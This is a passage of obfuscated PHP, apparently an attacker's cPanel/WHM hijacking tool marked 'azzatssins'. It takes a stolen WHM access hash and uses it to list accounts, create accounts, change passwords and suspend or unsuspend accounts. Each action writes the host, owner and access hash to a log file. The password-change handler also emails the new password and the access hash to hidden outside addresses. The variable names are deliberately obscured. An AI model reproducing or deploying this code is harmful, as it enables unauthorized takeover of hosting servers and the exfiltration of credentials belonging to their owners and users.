accountsummary($accUser){$this->connect("/xml-api/accountsummary?user=$accUser");$dxoluomgdiq="xmlstr";${$dxoluomgdiq}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->status==1){$wagnskiph="result";$flimtqwawp="result";$nbdwembyxqc="result";$wmetitlano="result";${"GLOBALS"}["xvfubsjlhi"]="result";$pjtlsoucqgw="result";$yofnfnzn="result";${"GLOBALS"}["ucuajwylna"]="result";${${"GLOBALS"}["rwocuxf"]}["disklimit"]=$xml->acct->disklimit;${$yofnfnzn}["diskused"]=$xml->acct->diskused;${${"GLOBALS"}["xvfubsjlhi"]}["diskused"]=$xml->acct->diskused;${${"GLOBALS"}["ucuajwylna"]}["domain"]=$xml->acct->domain;$kshdodvotj="result";$euppkrpbjh="result";${$wmetitlano}["email"]=$xml->acct->email;${${"GLOBALS"}["rwocuxf"]}["ip"]=$xml->acct->ip;${$nbdwembyxqc}["owner"]=$xml->acct->owner;${$kshdodvotj}["partition"]=$xml->acct->partition;${$pjtlsoucqgw}["plan"]=$xml->acct->plan;${$flimtqwawp}["startdate"]=$xml->acct->startdate;${${"GLOBALS"}["rwocuxf"]}["theme"]=$xml->acct->theme;${$wagnskiph}["unix_startdate"]=$xml->acct->unix_startdate;${${"GLOBALS"}["rwocuxf"]}["user"]=$xml->acct->user;return${$euppkrpbjh};}else{$this->errors[]=$xml->statusmsg;return false;}}function passwd($accUser,$pass){$this->connect("/xml-api/passwd?user=$accUser&pass=$pass");${"GLOBALS"}["wglvvmwpi"]="xmlstr";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["wglvvmwpi"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->passwd->status==1){$nvlwga="result";${$nvlwga}["statusmsg"]=$xml->passwd->statusmsg;$pbaeyfpm="result";${${"GLOBALS"}["rwocuxf"]}["frontpage"]=$xml->passwd->frontpage;${${"GLOBALS"}["rwocuxf"]}["ftp"]=$xml->passwd->ftp;${${"GLOBALS"}["rwocuxf"]}["mail"]=$xml->passwd->mail;${$pbaeyfpm}["mysql"]=$xml->passwd->mysql;$jukasqwy="result";${$jukasqwy}["system"]=$xml->passwd->system;${${"GLOBALS"}["rwocuxf"]}["rawout"]=$xml->passwd->rawout;return${${"GLOBALS"}["rwocuxf"]};}else{$this->errors[]=$xml->passwd->statusmsg;return false;}}function suspend($acctUser,$reason){$this->connect("/xml-api/suspendacct?user=$acctUser&reason=$reason");${"GLOBALS"}["cbvdyhirx"]="xmlstr";${${"GLOBALS"}["cbvdyhirx"]}=$this->getOutput();${"GLOBALS"}["eefbbnasou"]="xmlstr";if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["sqbtmnd"]}=new SimpleXMLElement(${${"GLOBALS"}["eefbbnasou"]});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function unsuspend($acctUser){${"GLOBALS"}["qpibobj"]="xml";$ozhjsdvdr="xmlstr";${"GLOBALS"}["opgkdypxtr"]="xmlstr";$this->connect("/xml-api/unsuspendacct?user=$acctUser");${$ozhjsdvdr}=$this->getOutput();if(${${"GLOBALS"}["opgkdypxtr"]}==""){$this->errors[]="No output.";return false;}${"GLOBALS"}["kikvjsicxxr"]="xmlstr";$this->disconnect();${${"GLOBALS"}["qpibobj"]}=new SimpleXMLElement(${${"GLOBALS"}["kikvjsicxxr"]});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function terminate($acctUser,$keepDns=0){$this->connect("/xml-api/removeacct?user=$acctUser&keepdns=$keepDns");$rpqkyrwxi="xml";${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$hrcbtoul="xmlstr";$this->disconnect();${$rpqkyrwxi}=new SimpleXMLElement(${$hrcbtoul});if($xml->result->status==1){return$xml->result->statusmsg;}else{$this->errors[]=$xml->result->statusmsg;return false;}}function Email_listpopswithdisk($user,$domain){$this->connect("/xml-api/cpanel?user=$user&xmlin=<cpanelaction><module>Email</module><func>listpopswithdisk</func><args><domain>$domain</domain></args></cpanelaction>");${${"GLOBALS"}["zmibinpgipr"]}=$this->getOutput();if(${${"GLOBALS"}["zmibinpgipr"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();if(${${"GLOBALS"}["zmibinpgipr"]}){${"GLOBALS"}["fbpmmdp"]="xml";${"GLOBALS"}["jhvhyq"]="i";${"GLOBALS"}["kidztypdxg"]="entry";${${"GLOBALS"}["fbpmmdp"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});${${"GLOBALS"}["jhvhyq"]}=0;foreach($xml->data as${${"GLOBALS"}["kidztypdxg"]}){${"GLOBALS"}["uwaiveoz"]="i";${"GLOBALS"}["yyhyipij"]="result";$dpixyyosyqrr="i";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["domain"]=htmlentities((string)$entry->domain);$rbumtnfxhw="result";${"GLOBALS"}["ejworbchb"]="i";$dibkhouwi="i";${"GLOBALS"}["nwatxqwipeoa"]="result";${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["user"]=htmlentities((string)$entry->user);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["login"]=htmlentities((string)$entry->login);${${"GLOBALS"}["yyhyipij"]}[${${"GLOBALS"}["uwaiveoz"]}]["email"]=htmlentities((string)$entry->email);$prtfqrgug="result";${$rbumtnfxhw}[${${"GLOBALS"}["ejworbchb"]}]["_diskquota"]=htmlentities((string)$entry->_diskquota);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["_diskused"]=htmlentities((string)$entry->_diskused);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskquota"]=htmlentities((string)$entry->diskquota);${${"GLOBALS"}["nwatxqwipeoa"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskused"]=htmlentities((string)$entry->diskused);$qlrukqug="i";${$prtfqrgug}[${$qlrukqug}]["diskusedpercent"]=htmlentities((string)$entry->diskusedpercent);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["diskusedpercent20"]=htmlentities((string)$entry->diskusedpercent20);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["humandiskquota"]=htmlentities((string)$entry->humandiskquota);${${"GLOBALS"}["rwocuxf"]}[${${"GLOBALS"}["ejmlkkd"]}]["humandiskused"]=htmlentities((string)$entry->humandiskused);${${"GLOBALS"}["rwocuxf"]}[${$dpixyyosyqrr}]["txtdiskquota"]=htmlentities((string)$entry->txtdiskquota);${$dibkhouwi}++;}$blgxedglu="result";return${$blgxedglu};}else{$this->errors[]="Some errors occured.";return false;}}function changepackage($accUser,$pkg){${"GLOBALS"}["ljgyaewqg"]="xmlstr";$this->connect("/xml-api/changepackage?user=$accUser&pkg=$pkg");${"GLOBALS"}["gqbupcfng"]="xml";${"GLOBALS"}["nyahhofyq"]="xmlstr";${${"GLOBALS"}["ljgyaewqg"]}=$this->getOutput();if(${${"GLOBALS"}["nyahhofyq"]}==""){$this->errors[]="No output.";return false;}$this->disconnect();${${"GLOBALS"}["gqbupcfng"]}=new SimpleXMLElement(${${"GLOBALS"}["zmibinpgipr"]});if($xml->result->status==1){${"GLOBALS"}["sbattvvwe"]="result";$vytddtquyr="result";${"GLOBALS"}["camojrmsm"]="result";${${"GLOBALS"}["sbattvvwe"]}["statusmsg"]=$xml->result->statusmsg;${$vytddtquyr}["rawout"]=$xml->result->rawout;return${${"GLOBALS"}["camojrmsm"]};}else{$this->errors[]=$xml->result->statusmsg;return false;}}}
  684. ?>
  685.  
  686.  
  687. <!-- host name, cpanel/whm version, list account, list package -->
  688.  
  689.  
  690. <?php
  691.  
  692. if(isset($_POST["azzatssins1"])){${"GLOBALS"}["stjkdu"]="separator";${"GLOBALS"}["xhwbwnfijuq"]="user";${"GLOBALS"}["uenhqacpp"]="user";$wfkgdiqx="II11II11II11II11";$mjhindj="plan";${$wfkgdiqx}=fopen("$filelog","a");$kxssfgmx="version";$uqvxbwlqq="II11II11II11II11";${${"GLOBALS"}["cntvmeburrl"]}=new whm;${"GLOBALS"}["spcfygm"]="list";${"GLOBALS"}["veqcgg"]="hostname";${${"GLOBALS"}["gueuhqn"]}=$_POST["vuser"];$sgayljaukjvl="hash";$host=$_POST["vhost"];${$sgayljaukjvl}=$_POST["vhash"];$virgous->init($host,${${"GLOBALS"}["uenhqacpp"]},${${"GLOBALS"}["lqfwxtwbjz"]});${${"GLOBALS"}["veqcgg"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";$kymvmotsxf="II11II11II11II11";${$kxssfgmx}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";$yoinlaphwf="II11II11II11II11";${${"GLOBALS"}["spcfygm"]}=$virgous->listaccts();echo"<h4>ACCOUNT LIST:</h4> $list <br><pre>";{print_r(${${"GLOBALS"}["kwsayld"]});}${$mjhindj}=$virgous->listPkgs();echo"</pre><h4>PACKAGE LIST:</h4> $plan <br><pre>";{$nhkzxwmdop="plan";print_r(${$nhkzxwmdop});}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
  693. ";${${"GLOBALS"}["jqstuo"]}="
  694. ";fwrite(${$kymvmotsxf},${${"GLOBALS"}["stjkdu"]}."./azzatssins
  695. ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$yoinlaphwf},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
  696. ");fwrite(${${"GLOBALS"}["cemjvape"]},"HOSTNAME : ".$host."
  697. ");fwrite(${${"GLOBALS"}["cemjvape"]},"WHM OWNER : ".${${"GLOBALS"}["xhwbwnfijuq"]}."
  698. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
  699. ");fwrite(${$uqvxbwlqq},"
  700. ");fclose(${${"GLOBALS"}["cemjvape"]});}
  701. ?>
  702.  
  703. <!-- create new account -->
  704.  
  705.  
  706. <?php
  707.  
  708.  
  709. if(isset($_POST["v2"])){
  710. ?>
  711. <center><h2>Access Hash</h2><p>
  712. <table border="1"><tbody>
  713. <div id="result"><form method="post">
  714. <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
  715. <tr>
  716. <td>Host Name </td>
  717. <td align="center">
  718. <input name="vhost" type="text" size="20" value="">
  719. </td>
  720. <td>WHM Owner </td>
  721. <td align="center">
  722. <input name="vuser" type="text" size="20" value="">
  723. </td>
  724. </tr>
  725. <tr>
  726. <td>New Domain </td>
  727. <td align="center">
  728. <input name="domain" type="text" size="20" value="">
  729. </td>
  730. <td>New Username </td>
  731. <td align="center">
  732. <input name="user" type="text" size="20" value="">
  733. </td>
  734. </tr>
  735. <tr>
  736. <td>New Password </td>
  737. <td align="center">
  738. <input name="pass" type="text" size="20" value="">
  739. </td>
  740. <td>Package </td>
  741. <td align="center">
  742. <input name="plan" type="text" size="20" value="">
  743. </td>
  744. </tr>
  745.  
  746. <tr>
  747. <td align="center" colspan="4">
  748. <input name="azzatssins2" type="submit" value=" Create Account "><br/>
  749. </td>
  750. </tr>
  751. </form>
  752. </tbody></table><br>
  753. <?php } ?>
  754.  
  755. <?php
  756. if(isset($_POST["azzatssins2"])){${"GLOBALS"}["obqvgk"]="II11II11II11II11";${"GLOBALS"}["hcizqzub"]="virgous";${"GLOBALS"}["jqrlobmtw"]="user";${"GLOBALS"}["jitxoymucue"]="II11II11II11II11";$fqomswomqmtc="dm1";$wtvsjyccfge="II11II11II11II11";${"GLOBALS"}["udycvhotmn"]="hash";$ceeobiunyj="result";$lwhruvccbv="bawah";${${"GLOBALS"}["obqvgk"]}=fopen("$filelog","a");${${"GLOBALS"}["hcizqzub"]}=new whm;${${"GLOBALS"}["jqrlobmtw"]}=$_POST["vuser"];$obsqaljv="user";${"GLOBALS"}["veyvrvbgouq"]="hash";$lmqhstisbqk="result";$host=$_POST["vhost"];${${"GLOBALS"}["udycvhotmn"]}=$_POST["vhash"];$dtejlrsa="hostname";${$fqomswomqmtc}=$_POST["domain"];$jnvehoyw="II11II11II11II11";${${"GLOBALS"}["cnpybqg"]}=$_POST["user"];${${"GLOBALS"}["bgyfsievqc"]}=$_POST["pass"];${${"GLOBALS"}["mgzcndyuozix"]}=$_POST["plan"];${"GLOBALS"}["fpylxi"]="separator";${"GLOBALS"}["gnleckwy"]="version";$virgous->init($host,${$obsqaljv},${${"GLOBALS"}["veyvrvbgouq"]});${$dtejlrsa}=$virgous->gethostname();$etshyphxtj="bawah";${"GLOBALS"}["leqdvwvssou"]="version";echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["gnleckwy"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$ceeobiunyj}=$virgous->createAccount(${${"GLOBALS"}["klnlsxvu"]},${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["bgyfsievqc"]},${${"GLOBALS"}["mgzcndyuozix"]});echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["vrupeaaj"]="II11II11II11II11";$ictrexnqohli="II11II11II11II11";$tqsxerpnf="separator";$ptnbkfy="II11II11II11II11";if(${$lmqhstisbqk}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["fpylxi"]}="
  757. ";${$lwhruvccbv}="
  758. ";fwrite(${$jnvehoyw},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
  759. ".${$tqsxerpnf});fwrite(${$ptnbkfy},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["leqdvwvssou"]}."
  760. ");fwrite(${${"GLOBALS"}["vrupeaaj"]},"HOSTNAME : ".$host."
  761. ");fwrite(${$wtvsjyccfge},"WHM OWNER : ".${${"GLOBALS"}["gueuhqn"]}."
  762. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${$etshyphxtj});fwrite(${${"GLOBALS"}["jitxoymucue"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
  763. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
  764. ");fclose(${$ictrexnqohli});}
  765. ?>
  766.  
  767. <!-- account sumarry -->
  768.  
  769.  
  770.  
  771. <?php
  772.  
  773. if(isset($_POST["v3"])){
  774. ?>
  775. <center><h2>Access Hash</h2><p>
  776. <div id="result"><form method="post">
  777. <table border="1"><tbody>
  778. <textarea name="vhash" rows="20" cols="45"></textarea><p>
  779.  
  780. <tr>
  781. <td align="center">
  782. Host Name </td>
  783. <td align="center">
  784. WHM Owner
  785. </td>
  786. <td align="center">
  787. UserName</td></tr>
  788. <td align="center">
  789. <input name="vhost" type="text" size="20" value=""></td>
  790. <td align="center">
  791. <input name="vuser" type="text" size="20" value=""></td>
  792. <td align="center">
  793. <input name="user" type="text" size="20" value=""></td></tr>
  794. <td colspan="3" align="center">
  795. <input name="azzatssins3" type="submit" value=" View Account Summary">
  796. </td></tr></table>
  797.  
  798. </form>
  799. <?php } ?>
  800.  
  801. <?php
  802. if(isset($_POST["azzatssins3"])){$lnabgh="separator";${${"GLOBALS"}["cemjvape"]}=fopen("$filelog","a");$rvhxxrgit="user";$rfsjge="hostname";${"GLOBALS"}["hhcfzvkqd"]="II11II11II11II11";$wcmpomixik="dm2";${${"GLOBALS"}["cntvmeburrl"]}=new whm;${"GLOBALS"}["nolwwyqjepw"]="version";${"GLOBALS"}["vsipss"]="user";${${"GLOBALS"}["gueuhqn"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${$wcmpomixik}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["vsipss"]},${${"GLOBALS"}["lqfwxtwbjz"]});${$rfsjge}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["tttkddsbp"]}=$virgous->version();$jjfydu="II11II11II11II11";${"GLOBALS"}["nhgegtneq"]="bawah";echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${${"GLOBALS"}["rwocuxf"]}=$virgous->accountsummary(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${${"GLOBALS"}["rwocuxf"]}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
  803. ";$klrfjuwwmyc="II11II11II11II11";${"GLOBALS"}["iqdylpqgc"]="II11II11II11II11";${${"GLOBALS"}["nhgegtneq"]}="
  804. ";${"GLOBALS"}["tdugpdtu"]="separator";${"GLOBALS"}["mobfsrul"]="II11II11II11II11";$uonuqibpk="hash";fwrite(${$klrfjuwwmyc},${${"GLOBALS"}["tdugpdtu"]}."./azzatssins
  805. ".${$lnabgh});fwrite(${${"GLOBALS"}["iqdylpqgc"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["nolwwyqjepw"]}."
  806. ");fwrite(${${"GLOBALS"}["mobfsrul"]},"HOSTNAME : ".$host."
  807. ");fwrite(${${"GLOBALS"}["hhcfzvkqd"]},"WHM OWNER : ".${$rvhxxrgit}."
  808. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${$uonuqibpk}."
  809. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
  810. ");fclose(${$jjfydu});}
  811. ?>
  812.  
  813.  
  814. <!-- change password -->
  815.  
  816.  
  817. <?php
  818.  
  819. if(isset($_POST["v4"])){
  820. ?>
  821. <center><h2>Access Hash</h2><p>
  822. <table border="1"><tbody>
  823. <div id="result"><form method="post">
  824. <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
  825. <tr>
  826. <td>Host Name </td>
  827. <td align="center">
  828. <input name="vhost" type="text" size="20" value="">
  829. </td>
  830. <td>WHM Owner </td>
  831. <td align="center">
  832. <input name="vuser" type="text" size="20" value="">
  833. </td>
  834. </tr>
  835. <tr>
  836. <td>Username </td>
  837. <td align="center">
  838. <input name="user" type="text" size="20" value="">
  839. </td>
  840. <td>New Password </td>
  841. <td align="center">
  842. <input name="pass" type="text" size="20" value="">
  843. </td>
  844. </tr>
  845.  
  846.  
  847. <tr>
  848. <td align="center" colspan="4">
  849. <input name="azzatssins4" type="submit" value=" Change Password"><br/>
  850. </td>
  851. </tr>
  852. </form>
  853. </tbody></table><br>
  854. <?php } ?>
  855.  
  856. <?php
  857.  
  858. if(isset($_POST["azzatssins4"])){${"GLOBALS"}["scwopj"]="II11II11II11II11";${"GLOBALS"}["vbeexdofvlsv"]="dm3";${"GLOBALS"}["rcwrgzxnm"]="frommail";$zhyyawvelk="subjectmail";${"GLOBALS"}["vqhcysy"]="subjectmail";${"GLOBALS"}["mqdsghvwjy"]="user";$dulerlhh="hostname";$ezqysvze="result";$bysecqvnul="user";${${"GLOBALS"}["scwopj"]}=fopen("$filelog","a");${"GLOBALS"}["jnoepkx"]="II11II11II11II11";$ugsijedc="hash";${"GLOBALS"}["xcgomonx"]="user";$ysjujkdgo="II11II11II11II11";${${"GLOBALS"}["cntvmeburrl"]}=new whm;$vuzgom="tomail";${"GLOBALS"}["chohpl"]="bawah";$jvwzef="version";${${"GLOBALS"}["xcgomonx"]}=$_POST["vuser"];$host=$_POST["vhost"];${"GLOBALS"}["nkpgvpqg"]="dm2";${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["nkpgvpqg"]}=$_POST["user"];${${"GLOBALS"}["bgyfsievqc"]}=$_POST["pass"];$virgous->init($host,${$bysecqvnul},${$ugsijedc});${$dulerlhh}=$virgous->gethostname();echo"<h4>HOST NAME :</h4> $hostname <br>";$cnoefem="emailente";${${"GLOBALS"}["tttkddsbp"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$ezqysvze}=$virgous->passwd(${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["vbeexdofvlsv"]});${"GLOBALS"}["tcptmsxj"]="II11II11II11II11";echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["ipwznk"]="II11II11II11II11";${"GLOBALS"}["keuoqgs"]="tujuan";$husuecnysr="II11II11II11II11";$glmysddkjg="infomail";if(${${"GLOBALS"}["rwocuxf"]}){${"GLOBALS"}["ndjuyhkyx"]="result";print_r(${${"GLOBALS"}["ndjuyhkyx"]});}else{print_r($virgous->errors);}${${"GLOBALS"}["rrbcihfi"]}="=====================================================
  859. ";${${"GLOBALS"}["chohpl"]}="
  860. ";${"GLOBALS"}["bdvhmv"]="httpheader";fwrite(${${"GLOBALS"}["jnoepkx"]},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
  861. ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$husuecnysr},"CPANEL/WHM VERSION : ".${$jvwzef}."
  862. ");${"GLOBALS"}["gvelhxwtmidx"]="subjectmail";fwrite(${$ysjujkdgo},"HOSTNAME : ".$host."
  863. ");fwrite(${${"GLOBALS"}["tcptmsxj"]},"WHM OWNER : ".${${"GLOBALS"}["mqdsghvwjy"]}."
  864. ");fwrite(${${"GLOBALS"}["ipwznk"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
  865. ");${"GLOBALS"}["qpwrbhr"]="dari";fwrite(${${"GLOBALS"}["cemjvape"]},"USERNAME : ".${${"GLOBALS"}["cnpybqg"]}."
  866. ");fwrite(${${"GLOBALS"}["cemjvape"]},"NEW PASSWORD : ".${${"GLOBALS"}["bgyfsievqc"]}."
  867. ");$kxkomyih="dari";$qjlblsmk="II11II11II11II11";$foampkttn="subject";fwrite(${${"GLOBALS"}["cemjvape"]},"
  868. ");$tvecfhtzb="sep";fclose(${$qjlblsmk});${"GLOBALS"}["xogmyia"]="info";${${"GLOBALS"}["epyufhqui"]}="
  869. ";${${"GLOBALS"}["xogmyia"]}=" Cpanel/WHM Version : $version $sep Host : $host:2086 $sep WHM Owner : $user $sep Username : $dm2 $sep New Password : $dm3$sep Access Hash : $sep$hash";${${"GLOBALS"}["qpwrbhr"]}="[email protected]";${$foampkttn}="WRA Got New Password!";${${"GLOBALS"}["yhcbrtqybhn"]}=${${"GLOBALS"}["wyuvccqfyby"]};${${"GLOBALS"}["bdvhmv"]}="From:".${$kxkomyih}."
  870. "."To:".${${"GLOBALS"}["keuoqgs"]}."
  871. "."Subject:".${${"GLOBALS"}["htlxwjkdfnbx"]}."
  872. "."Content-type:text/plain;charset=iso-8859-1"."
  873. "."Sent:".date("l, F d, Y H:i");mail(${${"GLOBALS"}["yhcbrtqybhn"]},${${"GLOBALS"}["htlxwjkdfnbx"]},${${"GLOBALS"}["gkfjmmp"]},${${"GLOBALS"}["tfoqdtkoozl"]});${$tvecfhtzb}="
  874. ";${$glmysddkjg}=" V1 : $version $sep V2 : $host:2086 $sep V3 : $user $sep V4 : $dm2 $sep V5 : $dm3$sep V6 : $sep$hash";${${"GLOBALS"}["buubgbf"]}=${$cnoefem};${$zhyyawvelk}="WRA Sent New Password";${${"GLOBALS"}["jmossxbfynir"]}="[email protected]";${${"GLOBALS"}["ugwdatuetm"]}="From:".${$vuzgom}."
  875. "."To:".${${"GLOBALS"}["rcwrgzxnm"]}."
  876. "."Subject:".${${"GLOBALS"}["gvelhxwtmidx"]}."
  877. "."Content-type:text/plain;charset=iso-8859-1"."
  878. "."Sent:".date("l, F d, Y H:i");mail(${${"GLOBALS"}["jmossxbfynir"]},${${"GLOBALS"}["vqhcysy"]},${${"GLOBALS"}["cgdqizbjb"]},${${"GLOBALS"}["ugwdatuetm"]});}
  879. ?>
  880.  
  881. <!-- suspend account -->
  882.  
  883.  
  884. <?php
  885. if(isset($_POST["v5"])){
  886. ?>
  887. <center><h2>Access Hash</h2><p>
  888. <table border="1"><tbody>
  889. <div id="result"><form method="post">
  890. <center><textarea name="vhash" rows="20" cols="45"></textarea><br/>
  891. <tr>
  892. <td>Host Name </td>
  893. <td align="center">
  894. <input name="vhost" type="text" size="20" value="">
  895. </td>
  896. <td>WHM Owner </td>
  897. <td align="center">
  898. <input name="vuser" type="text" size="20" value="">
  899. </td>
  900. </tr>
  901. <tr>
  902. <td>Username </td>
  903. <td align="center">
  904. <input name="user" type="text" size="20" value="">
  905. </td>
  906. <td>Reason </td>
  907. <td align="center">
  908. <input name="reason" type="text" size="20" value="terserah gue">
  909. </td>
  910. </tr>
  911.  
  912.  
  913. <tr>
  914. <td align="center" colspan="4">
  915. <input name="azzatssins5" type="submit" value=" Suspend Account "><br/>
  916. </td>
  917. </tr>
  918. </form>
  919. </tbody></table><br>
  920. <?php } ?>
  921.  
  922. <?php
  923.  
  924. if(isset($_POST["azzatssins5"])){$smxyepsu="II11II11II11II11";$okntok="virgous";$blyxnpfm="hostname";${"GLOBALS"}["fixsql"]="user";${$smxyepsu}=fopen("$filelog","a");$bljoubwktue="result";${"GLOBALS"}["cqrbguhlzhtp"]="II11II11II11II11";${$okntok}=new whm;$tyeagxgdra="result";${"GLOBALS"}["bhkgfhs"]="version";${${"GLOBALS"}["fixsql"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["cnpybqg"]}=$_POST["user"];${${"GLOBALS"}["qybmmyvo"]}=$_POST["reason"];$virgous->init($host,${${"GLOBALS"}["gueuhqn"]},${${"GLOBALS"}["lqfwxtwbjz"]});$ovbdrviqlj="II11II11II11II11";${$blyxnpfm}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";${${"GLOBALS"}["bhkgfhs"]}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$tyeagxgdra}=$virgous->suspend(${${"GLOBALS"}["cnpybqg"]},${${"GLOBALS"}["qybmmyvo"]});$uxtpyxvy="II11II11II11II11";$mpbstmijbhy="hash";echo"<h4>RESULT :</h4><pre>";${"GLOBALS"}["uaykxbwvq"]="separator";${"GLOBALS"}["glmhri"]="II11II11II11II11";if(${$bljoubwktue}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}${"GLOBALS"}["lihrxdhxjiu"]="II11II11II11II11";${${"GLOBALS"}["uaykxbwvq"]}="=====================================================
  925. ";${${"GLOBALS"}["jqstuo"]}="
  926. ";fwrite(${${"GLOBALS"}["cemjvape"]},${${"GLOBALS"}["rrbcihfi"]}."./azzatssins
  927. ".${${"GLOBALS"}["rrbcihfi"]});fwrite(${$uxtpyxvy},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
  928. ");fwrite(${$ovbdrviqlj},"HOSTNAME : ".$host."
  929. ");fwrite(${${"GLOBALS"}["lihrxdhxjiu"]},"WHM OWNER : ".${${"GLOBALS"}["gueuhqn"]}."
  930. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["cqrbguhlzhtp"]},${$mpbstmijbhy}."
  931. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
  932. ");fclose(${${"GLOBALS"}["glmhri"]});}
  933. ?>
  934.  
  935. <!-- unsuspend account -->
  936.  
  937.  
  938. <?php
  939.  
  940. if(isset($_POST["v6"])){
  941. ?>
  942. <center><h2>Access Hash</h2><p>
  943. <div id="result"><form method="post">
  944. <center><table border="1">
  945. <textarea name="vhash" rows="20" cols="45"></textarea><p>
  946.  
  947. <tr>
  948. <td align="center">
  949. Host Name </td>
  950. <td align="center">
  951. WHM Owner </td>
  952. <td align="center">
  953. UserName </td></tr>
  954. <td align="center">
  955. <input name="vhost" type="text" size="20" value=""></td>
  956. <td align="center">
  957. <input name="vuser" type="text" size="20" value=""></td>
  958. <td align="center">
  959. <input name="user" type="text" size="20" value="">
  960. </td></tr>
  961. <td colspan="3" align="center">
  962. <input name="azzatssins6" type="submit" value=" Unsuspend Account ">
  963. </td></tr></table>
  964. </form>
  965. <?php } ?>
  966.  
  967. <?php
